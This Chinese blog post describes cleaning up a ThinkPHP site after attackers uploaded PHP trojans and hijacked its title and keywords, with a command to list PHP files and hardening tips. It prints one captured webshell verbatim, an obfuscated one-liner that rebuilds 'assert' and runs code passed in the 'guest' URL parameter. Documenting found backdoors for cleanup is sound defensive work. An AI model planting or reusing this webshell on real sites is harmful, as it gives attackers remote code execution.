tp 如果被上传.php木马文件怎么处理

发表时间:2020-06-03 08:48:32
摘要信息

tp 如果被上传.php木马文件怎么处理

有很多网站被黑,导致网站关键词 网站标题 被修改,更可恶的是你如果发现的晚,关键词都被收录进去了,搞得很麻烦。
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200601225437171.png)
这是被上传的php文件之一,


<?php $poc ="axsxsxexrxt";$poc_1 = explode("x", $poc); $poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['guest']))));?>


这串代码,只要在url参数中输入 任意转码之后的代码 都可以执行,如 域名/config.cache.php?guest=echo 'hi';


如果你网站没有把静态资源做到静态云存储里面去,那么你的麻烦可大了...
如果你网站中存放静态资源的目录里面,文件夹繁多,那么久难找出这些木马文件,但是有一串代码可以查找出目录下所有的.php文件。
首先 ssh连接服务器,转到root用户,
然后CD到项目目录

cd /www/wwwroot/xxx/public


再查找

find . -type f -regex ".*\.php"




结果如下



最好你最好检查下网站是否有上传漏洞之类的...
其它的措施不清楚,第一次被搞,然后不需要的端口关闭掉,如果有好的办法请告知我,,我自己的博客最近存在这样的问题,也不知道是不是上述方法,能够彻底的防范,诸位大神如果有办法,请务必留言我,让我整一整...

40% Complete (success)